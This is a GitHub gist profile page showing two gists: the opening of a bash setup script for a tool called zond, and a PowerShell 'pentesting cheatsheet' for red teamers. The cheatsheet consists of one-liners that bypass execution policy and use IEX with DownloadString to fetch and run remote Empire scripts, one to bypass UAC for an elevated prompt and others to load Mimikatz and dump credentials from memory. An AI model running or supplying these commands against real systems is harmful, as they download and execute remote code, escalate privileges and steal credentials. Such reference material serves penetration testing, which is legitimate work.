Skip to content

Instantly share code, notes, and snippets.

View shorefall's full-sized avatar

shorefall shorefall

View GitHub Profile
@shorefall
shorefall / zond-setup.sh
Last active January 23, 2024 20:02
Bash zond setup script
View zond-setup.sh
#!/bin/bash
GREEN="\e[32m"
RESET="\e[0m"
green_echo() {
echo -e "${GREEN}$1${RESET}"
}
green_echo "[+] Currently not zsh compatible run as bash zond-setup.sh"
green_echo "[+] This currently assumes Go is not already installed on the system"
@shorefall
shorefall / pentesting_cheatsheet.ps1
Last active February 16, 2024 00:10
Intern Pentesting notes
View pentesting_cheatsheet.ps1
[+] Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
#Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
#Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
#Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"